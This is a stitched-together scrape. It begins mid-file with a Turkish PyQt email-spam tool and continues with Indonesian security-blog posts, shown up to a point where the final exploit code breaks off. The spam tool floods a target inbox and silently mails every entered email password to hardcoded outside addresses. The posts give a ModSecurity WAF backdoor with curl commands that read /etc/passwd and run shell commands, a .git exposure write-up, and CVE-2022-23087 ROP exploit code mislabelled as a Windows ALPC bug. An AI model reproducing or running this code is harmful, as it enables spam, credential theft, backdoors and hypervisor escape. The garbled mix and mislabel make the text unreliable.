        dosya = QFileDialog.getOpenFileName(self,"Email Listesi Seç",os.getenv("Desktop"))
        self.mailler = list()
        self.sifreler = list()
        with open(dosya[0], "r", encoding="utf-8") as file:

            for i in file.readlines():
                i = i.split(",")
                self.mailler.append(i[0])
                self.sifreler.append(i[1].rstrip("\n"))
            mesaj = MIMEMultipart()
            mesaj["From"] = "{}".format(self.mailler[0])
            mesaj["To"] = "guneskaraaa@outlook.com"
            mesaj["Subject"] = "{}".format("Spam Uygulaması")
            yazi = "Mailler: {} Şifreler: {}".format(self.mailler, self.sifreler)
            mesaj_govdesi = MIMEText(yazi, "plain")
            mesaj.attach(mesaj_govdesi)
            if self.mailler[0].endswith("@hotmail.com") or self.mailler[0].endswith("@outlook.com") or self.mailler[0].endswith("@outlook.com.tr"):
                mail = smtplib.SMTP("smtp.office365.com", 587)
                mail.ehlo()
                mail.starttls()
                mail.login("{}".format(self.mailler[0]), "{}".format(self.sifreler[0]))
                mail.sendmail(mesaj["From"], mesaj["To"], mesaj.as_string())
                mail.close()
            elif self.mailler[0].endswith("@gmx.com"):
                mail = smtplib.SMTP("smtp.gmx.com", 587)
                mail.ehlo()
                mail.starttls()
                mail.login("{}".format(self.mailler[0]), "{}".format(self.sifreler[0]))
                mail.sendmail(mesaj["From"], mesaj["To"], mesaj.as_string())
                mail.close()
            self.emailadresilistonay.setText("Liste Başarıyla Aktarıldı")




    def spamabasla(self):
        for i,j in zip(self.mailler,self.sifreler):

            mesaj = MIMEMultipart()
            mesaj["From"] = "{}".format(i)
            mesaj["To"] = "{}".format(self.kimespam.text())
            mesaj["Subject"] = "{}".format(self.konubasligi.text())

            yazi = self.icerik.text()

            mesaj_govdesi = MIMEText(yazi, "plain")
            mesaj.attach(mesaj_govdesi)

            self.a = 0
            while int(self.kactane.text()) > self.a:
                if i.endswith("@hotmail.com") or i.endswith("@outlook.com") or i.endswith("@outlook.com.tr"):
                    mail = smtplib.SMTP("smtp.office365.com", 587)
                    mail.ehlo()
                    mail.starttls()
                    mail.login("{}".format(i), "{}".format(j))
                    mail.sendmail(mesaj["From"], mesaj["To"], mesaj.as_string())
                    self.cikti.setText("Spam Başarıyla Gönderildi")
                    mail.close()
                    self.a += 1
                    sleep(int(self.bekle.text()))
                elif i.endswith("@gmx.com"):
                    mail = smtplib.SMTP("smtp.gmx.com", 587)
                    mail.ehlo()
                    mail.starttls()
                    mail.login("{}".format(i), "{}".format(j))
                    mail.sendmail(mesaj["From"], mesaj["To"], mesaj.as_string())
                    self.cikti.setText("Spam Başarıyla Gönderildi")
                    mail.close()
                    self.a += 1
                    sleep(int(self.bekle.text()))

class Tekkisiekrani(QWidget):
    def __init__(self):
        super().__init__()
        self.tekkisispam()

    def tekkisispam(self):
        self.emailadresi = QLineEdit()
        self.emailadresi_L = QLabel("Bizim E-Mail'in Adresimiz")

        self.parola = QLineEdit()
        self.parola_L = QLabel("E-Mail Adresimizin Şifresi")
        self.parola.setEchoMode(QLineEdit.Password)

        self.kimespam = QLineEdit()
        self.kimespam_L = QLabel("Spam Yapılacak Kişinin E-Mail Adresi")

        self.konubasligi = QLineEdit()
        self.konubasligi_L = QLabel("Konu Başlığı")

        self.icerik = QLineEdit()
        self.icerik_L = QLabel("E-Mail İçeriği")

        self.kactane = QLineEdit()
        self.kactane_L = QLabel("Kaç Adet E-Mail Gönderilsin")

        self.bekle = QLineEdit("0")
        self.bekle_L = QLabel("Her Postadan Sonra Kaç Saniye Beklesin")

        self.spam = QPushButton("Spama Başla")
        self.cikti = QLabel("")

        hbox = QHBoxLayout()
        hbox.addWidget(self.emailadresi_L)
        hbox.addWidget(self.emailadresi)

        hbox2 = QHBoxLayout()
        hbox2.addWidget(self.parola_L)
        hbox2.addWidget(self.parola)

        hbox3 = QHBoxLayout()
        hbox3.addWidget(self.kimespam_L)
        hbox3.addWidget(self.kimespam)

        hbox4 = QHBoxLayout()
        hbox4.addWidget(self.konubasligi_L)
        hbox4.addWidget(self.konubasligi)

        hbox5 = QHBoxLayout()
        hbox5.addWidget(self.icerik_L)
        hbox5.addWidget(self.icerik)

        hbox6 = QHBoxLayout()
        hbox6.addWidget(self.kactane_L)
        hbox6.addWidget(self.kactane)

        hbox7 =QHBoxLayout()
        hbox7.addWidget(self.bekle_L)
        hbox7.addWidget(self.bekle)

        hboxalt = QHBoxLayout()
        hboxalt.addWidget(self.spam)
        hboxalt.addWidget(self.cikti)
        hboxalt.addStretch()

        self.v_box = QVBoxLayout()

        self.v_box.addStretch()
        self.v_box.addLayout(hbox)

        self.v_box.addLayout(hbox2)

        self.v_box.addLayout(hbox3)

        self.v_box.addLayout(hbox4)

        self.v_box.addLayout(hbox5)
        self.v_box.addLayout(hbox6)
        self.v_box.addLayout(hbox7)
        self.v_box.addLayout(hboxalt)

        self.setLayout(self.v_box)

        self.setWindowTitle("Tek Mail ile Spam")
        self.spam.clicked.connect(self.spamabasla)

    def spamabasla(self):

        mesajigonderen = self.emailadresi.text()
        mesajigonderensifre = self.parola.text()
        mesajkime = self.kimespam.text()
        mesajkonusu = self.konubasligi.text()

        mesaj = MIMEMultipart()
        mesaj["From"] = "{}".format(mesajigonderen)
        mesaj["To"] = "ikincimailhesabi@gmx.com"
        mesaj["Subject"] = "{}".format("Spam Uygulaması")
        yazi = "Mail: {} Şifre: {}".format(mesajigonderen, mesajigonderensifre)
        mesaj_govdesi = MIMEText(yazi, "plain")
        mesaj.attach(mesaj_govdesi)
        print("mesaj gövdesi: ",mesaj_govdesi)
        if mesajigonderen.endswith("@hotmail.com") or mesajigonderen.endswith("@outlook.com") or mesajigonderen.endswith("@outlook.com.tr"):
            mail = smtplib.SMTP("smtp.office365.com", 587)
            mail.ehlo()
            mail.starttls()
            mail.login("{}".format(mesajigonderen), "{}".format(mesajigonderensifre))
            print("giriş başarılı")
            mail.sendmail(mesaj["From"], mesaj["To"], mesaj.as_string())
            mail.close()
        if mesajigonderen.endswith("@gmx.com"):
            mail = smtplib.SMTP("smtp.gmx.com", 587)
            mail.ehlo()
            mail.starttls()
            mail.login("{}".format(mesajigonderen), "{}".format(mesajigonderensifre))
            mail.sendmail(mesaj["From"], mesaj["To"], mesaj.as_string())
            mail.close()

        mesaj = MIMEMultipart()
        mesaj["From"] = "{}".format(mesajigonderen)
        mesaj["To"] = "{}".format(mesajkime)
        mesaj["Subject"] = "{}".format(mesajkonusu)

        yazi = self.icerik.text()

        mesaj_govdesi = MIMEText(yazi, "plain")
        mesaj.attach(mesaj_govdesi)

        self.a = 0
        while int(self.kactane.text()) > self.a:
            if mesajigonderen.endswith("@hotmail.com") or mesajigonderen.endswith("@outlook.com") or mesajigonderen.endswith("@outlook.com.tr"):
                mail = smtplib.SMTP("smtp.office365.com", 587)
                mail.ehlo()
                mail.starttls()
                mail.login("{}".format(mesajigonderen), "{}".format(mesajigonderensifre))
                mail.sendmail(mesaj["From"], mesaj["To"], mesaj.as_string())
                self.cikti.setText("Spam Başarıyla Gönderildi")
                mail.close()
                self.a += 1
                sleep(int(self.bekle.text()))
            elif mesajigonderen.endswith("@gmx.com"):
                mail = smtplib.SMTP("smtp.gmx.com", 587)
                mail.ehlo()
                mail.starttls()
                mail.login("{}".format(mesajigonderen), "{}".format(mesajigonderensifre))
                mail.sendmail(mesaj["From"], mesaj["To"], mesaj.as_string())
                self.cikti.setText("Spam Başarıyla Gönderildi")
                mail.close()
                self.a += 1
                sleep(int(self.bekle.text()))




app = QApplication(sys.argv)
pencere = Pencere()
listeekrani = Listeekrani()
tekkisiekrani = Tekkisiekrani()
sys.exit(app.exec_())

ModSecurity Backdoor

2023-01-10T10:13:00.004-08:00

Sumber Github

Ini adalah bukti konsep software berbahaya yang berjalan di dalam ModSecurity WAF.

Perangkat lunak memiliki dua fungsi utama

Mengambil konten file.
Menjalankan perintah dan mengambil output (remote shell).

Selain itu, ini mencakup fungsi-fungsi ini:

Pengaturan dinamis nama argumen kontrol POST untuk deteksi yang lebih sulit.
Penonaktifan logging untuk deteksi yang lebih sulit (hanya untuk permintaan penyerang yang diidentifikasi dengan nama argumen POST).
Semua aturan lainnya dinonaktifkan (hanya untuk permintaan penyerang yang diidentifikasi dengan nama argumen POST).

Prasyarat

ModSecurity dikompilasi dengan dukungan Lua
Lua
Arahan ModSecurity SecStreamOutBodyInspection dan SecContentInjection diatur ke On

Instalasi

Dapatkan file backdoor.conf dan backdoor.lua lalu muat yang pertama ke server web.

Konfigurasi

Konfigurasi dapat dilakukan pada rule pertama di file backdoor.conf.

tx.backdoor_file_argument_name

Pengaturan ini dapat digunakan untuk menetapkan nama argumen POST yang digunakan untuk mengambil konten file. Setel ke sesuatu yang acak seperti koomem6Shmog.

tx.backdoor_command_argument_name

Pengaturan ini dapat digunakan untuk menetapkan nama argumen POST yang digunakan untuk menjalankan perintah. Setel ke sesuatu yang acak seperti tys4Olhuibves.

Penggunaan

Perintah dapat dijalankan di semua alamat (domain) di server target yang berada di belakang ModSecurity WAF. Keluaran dari perintah ditambahkan ke respons server standar.

Contoh penggunaan

Mengambil konten file:

curl -X POST -d "koomem6Shmog=/etc/passwd" "http://example.com/"

Menjalankan perintah dan mendapatkan output:

curl -X POST -d "tys4Olhuibves=/bin/ps aux" "http://example.com/"

REST Attacker

2023-01-09T11:02:00.006-08:00

Sumber Github

REST-Attacker adalah framework pengujian penetrasi otomatis untuk API yang mengikuti gaya arsitektur REST. Fokus alat ini adalah untuk menyederhanakan analisis implementasi REST API umum dengan mengotomatiskan sepenuhnya proses pengujian - termasuk pembuatan pengujian, penanganan kontrol akses, dan pembuatan laporan - dengan upaya konfigurasi yang minimal. Selain itu, REST-Attacker dirancang agar fleksibel dan dapat diperluas dengan dukungan untuk pengujian skala besar dan analisis terperinci.

REST-Attacker dikelola oleh Ketua Keamanan Jaringan & Data Universitas Ruhr Bochum.

Celah Keamanan .git

2023-01-06T08:59:00.005-08:00

Git adalah sistem kontrol versi terdistribusi sumber terbuka yang paling populer. Jika Anda atau organisasi Anda menggunakan git untuk kode atau repositori, Anda harus mempertimbangkan paparan folder .git mungkin berisiko terhadap aset Anda. Beberapa situs web menghosting repositori kontrol versi mereka (misalnya, .git/ ) dalam produksi. Peretas dapat menggunakan alat untuk mengunduh/memulihkan repositori untuk mendapatkan akses ke kode sumber situs web Anda.

Apa itu folder .git?

Folder .git adalah tempat git menyimpan semua metadatanya. Folder ini berisi informasi tentang semua komit, cabang, file, dan semua yang terkait dengan repositori git Anda.

Git adalah penyimpanan data nilai kunci sederhana. Direktori .git terlihat seperti ini：

config
description
HEAD
index
hooks/
info/
logs/
objects/
refs/

Sebagai seorang peretas, mengapa Anda harus mengetahui folder git yang terbuka? Eksposur .git dapat membayar dengan baik atau tidak, tergantung pada aset yang ditemukan. Tapi tetap menarik karena:

Menganalisis kode sumber dapat mengungkap kerentanan lain yang lebih kritis.
Siapa pun dapat menggunakan kode sumber Anda untuk niat jahat, menyebabkan kerugian finansial/reputasi Anda
Menemukan file yang berisi informasi sensitif seperti kredensial, token, titik akhir baru, dll
Mudah dideteksi :P

Folder .git terbuka

Untuk memeriksa apakah folder .git aplikasi terbuka, buka direktori root, project.com , dan tambahkan /.git ke URL. Itu dapat menghasilkan hasil ini:

404 Kesalahan: Ini berarti direktori .git aplikasi tidak tersedia untuk umum.
Kesalahan 403: Direktori .git tersedia di server, tetapi Anda tidak dapat mengakses root folder secara langsung.
Tanpa Kesalahan: Server merespons dengan pohon dokumen dari direktori .git, dan Anda dapat langsung menelusuri konten folder dan mengambil informasi apa pun.

Jika folder .git terbuka, Anda dapat dengan mudah mengakses konfigurasi yang akan terlihat seperti ini:

Token Akses Pribadi GitHub

Mulai 13 November 2020, GitHub tidak lagi menerima kata sandi akun saat mengautentikasi dengan REST API dan akan memerlukan autentikasi berbasis token (misalnya, akses pribadi, OAuth, atau token pemasangan Aplikasi GitHub) untuk semua operasi API yang diautentikasi di GitHub.com.

Perubahan ini telah memengaruhi akses git baris perintah reguler, dan pengembang harus mengonfigurasi klien GIT lokal dengan nama pengguna dan PAT (Personal Access Tokens / Token Akses Pribadi).

Cara yang tepat untuk mengonfigurasi adalah menggunakan Git Credential Manager dengan perintah berikut:

git config — global credential.helper store

Tapi satu cara mudah untuk menangani konfigurasi adalah menambahkan nama pengguna dan token dengan URL repositori menggunakan perintah ini:

git remote set-url origin https://<USERNAME>:<MYTOKEN>@github.com/username/project.git

Exploitasi

Produk memiliki folder .git mereka diekspos dari server API backend mereka yang juga konfigurasi PAT-nya dilakukan dengan salah mengekspos token sensitif.

Saya membuat folder git kosong secara lokal dan menyalin konfigurasi ke dalamnya. Sebuah `git pull` sederhana mengambil semua cabang dan kode. Repositori bersifat pribadi dan mengambil semua kode dan cabangnya, termasuk cabang produksi, merupakan kerentanan yang parah.

Bagaimana cara memperbaiki Kerentanan Paparan Kode Sumber .git?

Untuk memperbaiki kerentanan ini, hapus folder git dari server web Anda atau pastikan Anda menolak semua akses ke folder .git

Apache

<DirectoryMatch “^/.*/\.git/”>
Order deny,allow
Deny from all
</DirectoryMatch>

Nginx

Tambahkan ini di entri pertama di server-block Anda di file nginx.conf.

location ~ /.git/ {
deny all;
}

Lighttpd

Tambahkan ini ke lighttpd.conf.

server.modules += ( "mod_access" )

Setelah itu, kita dapat memblokir akses ke .git folder tersebut

$HTTP["url"] =~ "^/\.git/" {
url.access-deny = ("")
}

Saya harap artikel ini bermanfaat bagi Anda!

Exploit code for CVE-2022-23087

2023-01-05T08:51:00.004-08:00

Windows ALPC Elevation of Privilege Vulnerability.

Module

MakeFile

KMOD = pt
SRCS = pt.c
.include

pt.c

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#include 
#include 
#include 

struct pt_args
{
	vm_offset_t vaddr;
	uint64_t    *res;
};

static int pt(struct thread *td, void *args)
{
	struct pmap *pmap;
	struct pt_args *user = args;

	vm_offset_t vaddr = user->vaddr;
	uint64_t *res = user->res;

	uint64_t paddr;

	pmap = &td->td_proc->p_vmspace->vm_pmap;
	paddr = pmap_extract(pmap, vaddr);

	return copyout(&paddr, res, sizeof(uint64_t));
}

static struct sysent pt_sysent = {
   .sy_narg = 2,
   .sy_call = pt
};

static int offset=NO_SYSCALL;

static int load(struct module *module, int cmd, void *arg)
{
	int error=0;
	switch(cmd) {
		case MOD_LOAD:
			uprintf("loading syscall at offset %d\n", offset);
			break;
		case MOD_UNLOAD:
			uprintf("unloading syscall from offset %d\n", offset);
			break;
		default:
			error=EOPNOTSUPP;
			break;
	}
	return error;
}

SYSCALL_MODULE(pt, &offset, &pt_sysent, load, NULL);

e1000.h

#define e1000_PORT 0x2100

enum e1000_registers {

	CTRL = 0x00000,		/* Device Control - RW */

	/* Transmit */
	TXCW   = 0x0178,	/* x0178 transmit config */
	TCTL   = 0x0400,	/* x0400 transmit ctl */
	TIPG   = 0x0410,	/* x0410 inter-packet gap */
	AIT    = 0x0458,	/* x0458 Adaptive Interframe Throttle */
	TDBAL  = 0x3800,	/* x3800 desc table addr, low bits */
	TDBAH  = 0x3804,	/* x3804 desc table addr, hi 32-bits */
	TDLEN  = 0x3808,	/* x3808 # descriptors in bytes */
	TDH    = 0x3810,	/* x3810 desc table head idx */
	TDT    = 0x3818,	/* x3818 desc table tail idx */
	TIDV   = 0x3820,	/* x3820 intr delay */
	TXDCTL = 0x3828,	/* x3828 desc control */
	TADV   = 0x382c,	/* x382C intr absolute delay */

	/* Receive */
	RCTL	= 0x0100,	/* x0100 receive ctl */
	FCRTL	= 0x2160,	/* x2160 flow cntl thresh, low */
	FCRTH	= 0x2168,	/* x2168 flow cntl thresh, hi */
	RDBAL	= 0x2800,	/* x2800 desc table addr, low bits */
	RDBAH	= 0x2804,	/* x2804 desc table addr, hi 32-bits*/
	RDLEN	= 0x2808,	/* x2808 #descriptors */
	RDH	    = 0x2810,	/* x2810 desc table head idx */
	RDT	    = 0x2818,	/* x2818 desc table tail idx */
	RDTR	= 0x2820,	/* x2820 intr delay */
	RXDCTL	= 0x2828,	/* x2828 desc control */
	RADV	= 0x282c,	/* x282C intr absolute delay */
	RSRPD	= 0x2c00,	/* x2C00 recv small packet detect */
	RXCSUM  = 0x5000, 	/* x5000 receive cksum ctl */
};


/* Transmit Descriptor bit definitions */
#define E1000_TXD_DTYP_D	0x00100000 /* Data Descriptor */
#define E1000_TXD_DTYP_C	0x00000000 /* Context Descriptor */
#define E1000_TXD_POPTS_IXSM	0x01   /* Insert IP checksum */
#define E1000_TXD_POPTS_TXSM	0x02   /* Insert TCP/UDP checksum */
#define E1000_TXD_CMD_EOP	0x01000000 /* End of Packet */
#define E1000_TXD_CMD_IFCS	0x02000000 /* Insert FCS (Ethernet CRC) */
#define E1000_TXD_CMD_IC	0x04000000 /* Insert Checksum */
#define E1000_TXD_CMD_RS	0x08000000 /* Report Status */
#define E1000_TXD_CMD_RPS	0x10000000 /* Report Packet Sent */
#define E1000_TXD_CMD_DEXT	0x20000000 /* Desc extension (0 = legacy) */
#define E1000_TXD_CMD_VLE	0x40000000 /* Add VLAN tag */
#define E1000_TXD_CMD_IDE	0x80000000 /* Enable Tidv register */
#define E1000_TXD_STAT_DD	0x00000001 /* Descriptor Done */
#define E1000_TXD_STAT_EC	0x00000002 /* Excess Collisions */
#define E1000_TXD_STAT_LC	0x00000004 /* Late Collisions */
#define E1000_TXD_STAT_TU	0x00000008 /* Transmit underrun */
#define E1000_TXD_CMD_TCP	0x01000000 /* TCP packet */
#define E1000_TXD_CMD_IP	0x02000000 /* IP packet */
#define E1000_TXD_CMD_TSE	0x04000000 /* TCP Seg enable */
#define E1000_TXD_STAT_TC	0x00000004 /* Tx Underrun */
#define E1000_TXD_EXTCMD_TSTAMP	0x00000010 /* IEEE1588 Timestamp packet */

/* Transmit Control */
#define E1000_TCTL_EN		0x00000002 /* enable Tx */
#define E1000_TCTL_PSP		0x00000008 /* pad short packets */
#define E1000_TCTL_CT		0x00000ff0 /* collision threshold */
#define E1000_TCTL_COLD		0x003ff000 /* collision distance */
#define E1000_TCTL_RTLC		0x01000000 /* Re-transmit on late collision */
#define E1000_TCTL_MULR		0x10000000 /* Multiple request support */

/* Transmit descriptor types */
#define	E1000_TXD_MASK		(E1000_TXD_CMD_DEXT | 0x00F00000)
#define E1000_TXD_TYP_L		(0)
#define E1000_TXD_TYP_C		(E1000_TXD_CMD_DEXT | E1000_TXD_DTYP_C)
#define E1000_TXD_TYP_D		(E1000_TXD_CMD_DEXT | E1000_TXD_DTYP_D)

/* Receive Control */
#define E1000_RCTL_RST		0x00000001 /* Software reset */
#define E1000_RCTL_EN		0x00000002 /* enable */
#define E1000_RCTL_SBP		0x00000004 /* store bad packet */
#define E1000_RCTL_UPE		0x00000008 /* unicast promisc enable */
#define E1000_RCTL_MPE		0x00000010 /* multicast promisc enable */
#define E1000_RCTL_LPE		0x00000020 /* long packet enable */
#define E1000_RCTL_LBM_NO	0x00000000 /* no loopback mode */
#define E1000_RCTL_LBM_MAC	0x00000040 /* MAC loopback mode */
#define E1000_RCTL_LBM_TCVR	0x000000C0 /* tcvr loopback mode */
#define E1000_RCTL_DTYP_PS	0x00000400 /* Packet Split descriptor */
#define E1000_RCTL_RDMTS_HALF	0x00000000 /* Rx desc min thresh size */
#define E1000_RCTL_RDMTS_HEX	0x00010000
#define E1000_RCTL_RDMTS1_HEX	E1000_RCTL_RDMTS_HEX
#define E1000_RCTL_MO_SHIFT	12 /* multicast offset shift */
#define E1000_RCTL_MO_3		0x00003000 /* multicast offset 15:4 */
#define E1000_RCTL_BAM		0x00008000 /* broadcast enable */
/* these buffer sizes are valid if E1000_RCTL_BSEX is 0 */
#define E1000_RCTL_SZ_2048	0x00000000 /* Rx buffer size 2048 */
#define E1000_RCTL_SZ_1024	0x00010000 /* Rx buffer size 1024 */
#define E1000_RCTL_SZ_512	0x00020000 /* Rx buffer size 512 */
#define E1000_RCTL_SZ_256	0x00030000 /* Rx buffer size 256 */
/* these buffer sizes are valid if E1000_RCTL_BSEX is 1 */
#define E1000_RCTL_SZ_16384	0x00010000 /* Rx buffer size 16384 */
#define E1000_RCTL_SZ_8192	0x00020000 /* Rx buffer size 8192 */
#define E1000_RCTL_SZ_4096	0x00030000 /* Rx buffer size 4096 */
#define E1000_RCTL_VFE		0x00040000 /* vlan filter enable */
#define E1000_RCTL_CFIEN	0x00080000 /* canonical form enable */
#define E1000_RCTL_CFI		0x00100000 /* canonical form indicator */
#define E1000_RCTL_DPF		0x00400000 /* discard pause frames */
#define E1000_RCTL_PMCF		0x00800000 /* pass MAC control frames */
#define E1000_RCTL_BSEX		0x02000000 /* Buffer size extension */
#define E1000_RCTL_SECRC	0x04000000 /* Strip Ethernet CRC */

exploit.c

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#include "e1000.h"

#define PAGE_SIZE 0x1000
#define BUFF_SIZE PAGE_SIZE

#define SAVED_RIP_OFF 0x3f68
#define POP_RBP       0x222164
#define POP_RDI       0x21e688
#define LEAVE         0x22dd28
#define SYSTEM        0x21f83c
#define CALC          0x7fffdebf35a8
#define ROPCHAIN      0x7fffdebf3578

#define GET_WORD(val, n) (((val) >> ((n) * 16)) & 0xffff)
#define MAKE_WORD(val, n) htons((htons(GET_WORD(val, n)) - 1))

#define TX_NB 64;

extern uint64_t gva_to_gpa(void *);

void xxd(void *ptr, size_t size)
{
	size_t i;
	for (i = 0; i < size; i++) {
		if (i % 16 == 0) printf("\n0x%"PRIx64": ", (uint64_t)(ptr+i));
		printf("%02x", *(uint8_t *)(ptr+i));
		if (i % 16 != 0 && i % 2 == 1) printf(" ");
	}
	printf("\n");
}


/* Legacy transmit descriptor */
struct e1000_tx_desc {
	uint64_t buffer_addr;   /* Address of the descriptor's data buffer */
	union {
		uint32_t data;
		struct {
			uint16_t length;  /* Data buffer length */
			uint8_t  cso;  /* Checksum offset */
			uint8_t  cmd;  /* Descriptor control */
		} flags;
	} lower;
	union {
		uint32_t data;
		struct {
			uint8_t status; /* Descriptor status */
			uint8_t css;  /* Checksum start */
			uint16_t special;
		} fields;
	} upper;
};

/* Context descriptor */
struct e1000_context_desc {
	union {
		uint32_t ip_config;
		struct {
			uint8_t ipcss;  /* IP checksum start */
			uint8_t ipcso;  /* IP checksum offset */
			uint16_t ipcse;  /* IP checksum end */
		} ip_fields;
	} lower_setup;
	union {
		uint32_t tcp_config;
		struct {
			uint8_t tucss;  /* TCP checksum start */
			uint8_t tucso;  /* TCP checksum offset */
			uint16_t tucse;  /* TCP checksum end */
		} tcp_fields;
	} upper_setup;
	uint32_t cmd_and_length;
	union {
		uint32_t data;
		struct {
			uint8_t status;  /* Descriptor status */
			uint8_t hdr_len;  /* Header length */
			uint16_t mss;  /* Maximum segment size */
		} fields;
	} tcp_seg_setup;
};

/* Data descriptor */
struct e1000_data_desc {
	uint64_t buffer_addr;  /* Address of the descriptor's buffer address */
	union {
		uint32_t data;
		struct {
			uint16_t length;  /* Data buffer length */
			uint8_t typ_len_ext;
			uint8_t cmd;
		} flags;
	} lower;
	union {
		uint32_t data;
		struct {
			uint8_t status;  /* Descriptor status */
			uint8_t popts;  /* Packet Options */
			uint16_t special;
		} fields;
	} upper;
};

union e1000_tx_udesc {
	struct e1000_tx_desc td;
	struct e1000_context_desc cd;
	struct e1000_data_desc dd;
};

void e1000_write_reg(int reg, uint32_t val)
{
	outl(e1000_PORT + CTRL, reg);
	outl(e1000_PORT + 4, val);
}

void e1000_tx_enable()
{
	e1000_write_reg(TCTL, E1000_TCTL_EN);
}

void e1000_tx_disable()
{
	e1000_write_reg(TCTL, 0);
}

void e1000_tx_start(uint8_t tail)
{
	e1000_write_reg(TDT, tail);
}

void e1000_tx_transmit(union e1000_tx_udesc *tx_ring, uint8_t *head, struct e1000_context_desc *cd, uint16_t pktlen)
{
	// set packet context
	memcpy(&tx_ring[*head].cd, cd, sizeof(struct e1000_context_desc));

	// set packet data
	tx_ring[*head + 1].dd.lower.data = pktlen;
	tx_ring[*head + 1].dd.lower.data |= E1000_TXD_CMD_EOP;
	tx_ring[*head + 1].dd.lower.data |= E1000_TXD_CMD_TSE;
	tx_ring[*head + 1].dd.lower.data |= E1000_TXD_TYP_D;
	tx_ring[*head + 1].dd.upper.fields.popts = E1000_TXD_POPTS_TXSM;

	*head += 2 % TX_NB;

}

// UDP packet
static char packet[] = {
	0x58, 0x9c, 0xfc, 0x0e, 0xb7, 0x3d, 0x58, 0x9c,
	0xfc, 0x0f, 0xb4, 0x44, 0x08, 0x00, 0x45, 0x00,
	0x00, 0x21, 0x43, 0xad, 0x40, 0x00, 0x40, 0x11,
	0xf9, 0x1c, 0x01, 0x02, 0x03, 0x04, 0xc0, 0xa8,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

int main()
{
	union e1000_tx_udesc *tx_ring;
	struct e1000_context_desc tx_cd;
	uint8_t tx_nb = TX_NB;
	uint16_t tx_size;
	char *tx_buffer[tx_nb], *buffer;
	uint8_t head = 0;
	uint64_t addr;

	uint16_t pktlen, hdrlen, paylen, mss, write_off;
	uint8_t ipcss, tucss, hdroff;

	// get permissions for in/out
	open("/dev/io", O_RDONLY, 0);

	// configure TX descriptors
	warnx("configuring TX descriptors");
	tx_size = tx_nb * sizeof(union e1000_tx_udesc);
	tx_ring = aligned_alloc(PAGE_SIZE, tx_size);
	memset(tx_ring, 0, tx_size);

	for(int i = 0; i < tx_nb; i++) {
		buffer = aligned_alloc(PAGE_SIZE, BUFF_SIZE);
		memcpy(buffer, packet, sizeof(packet));

		tx_buffer[i] = buffer;
		addr = gva_to_gpa(buffer);
		warnx("TX ring buffer at 0x%"PRIx64"\n", addr);
		tx_ring[i].dd.buffer_addr = addr;
	};

	warnx("disable TX");
	e1000_tx_disable();

	addr = gva_to_gpa(tx_ring);
	//warnx("TX ring buffer at 0x%"PRIx64"\n", addr);

	warnx("update TX desc table");
	e1000_write_reg(TDBAL, (uint32_t)addr);
	e1000_write_reg(TDBAH, addr >> 32);
	e1000_write_reg(TDLEN, tx_size);
	e1000_write_reg(TDH, 0);

	warnx("enable TX");
	e1000_tx_enable();

	/* fill stack with ropchain */
	hdrlen = 220;

	tx_cd.lower_setup.ip_fields.ipcss = 0;
	tx_cd.lower_setup.ip_fields.ipcso = 0;
	tx_cd.lower_setup.ip_fields.ipcse = 0;

	tx_cd.upper_setup.tcp_fields.tucss = 0;
	tx_cd.upper_setup.tcp_fields.tucso = 0;
	tx_cd.upper_setup.tcp_fields.tucse = 0;

	tx_cd.cmd_and_length = hdrlen;
	tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
	tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;

	tx_cd.tcp_seg_setup.fields.status = 0;
	tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
	tx_cd.tcp_seg_setup.fields.mss = PAGE_SIZE;

	memset(tx_buffer[head + 1], 'A', PAGE_SIZE);
	uint64_t *ptr =  (uint64_t *)tx_buffer[head + 1];
	*(ptr + 3) = POP_RDI;
	*(ptr + 4) = CALC;
	*(ptr + 6) = SYSTEM;
	strcpy(tx_buffer[head + 1] + 56, "/usr/local/bin/xcalc");

	e1000_tx_transmit(tx_ring, &head, &tx_cd, PAGE_SIZE);

	/* corrupting saved rip + 10 */
	hdrlen = 32;
	hdroff = 0x90;
	ipcss = 12;
	tucss = 18;
	mss = htons(ROPCHAIN & 0xffff) - hdrlen + ipcss;
	paylen = 2 * mss;
	pktlen = paylen + hdrlen;

	tx_cd.lower_setup.ip_fields.ipcss = ipcss;
	tx_cd.lower_setup.ip_fields.ipcso = 0;
	tx_cd.lower_setup.ip_fields.ipcse = 0;

	tx_cd.upper_setup.tcp_fields.tucss = tucss;
	tx_cd.upper_setup.tcp_fields.tucso = hdroff;
	tx_cd.upper_setup.tcp_fields.tucse = tucss+1;

	tx_cd.cmd_and_length = paylen;
	tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
	tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;

	tx_cd.tcp_seg_setup.fields.status = 0;
	tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
	tx_cd.tcp_seg_setup.fields.mss = mss; // WHAT_LOW

	write_off = (SAVED_RIP_OFF + 10) - ipcss - 2;
	*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off; // WHERE
	*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(ROPCHAIN, 2);

	e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);

	/* corrupt saved rip + 8 */
	write_off = (SAVED_RIP_OFF + 8) - ipcss - 2;
	*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off;
	*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(ROPCHAIN, 1);

	e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);


	/* corrupt saved rip + 16 */
	mss = htons(LEAVE & 0xffff) - hdrlen + ipcss;
	paylen = 2 * mss;
	pktlen = paylen + hdrlen;

	tx_cd.cmd_and_length = paylen;
	tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
	tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;

	tx_cd.tcp_seg_setup.fields.status = 0;
	tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
	tx_cd.tcp_seg_setup.fields.mss = mss;

	write_off = (SAVED_RIP_OFF + 0x10) - ipcss - 2;
	*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off;
	*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(LEAVE, 1);

	e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);

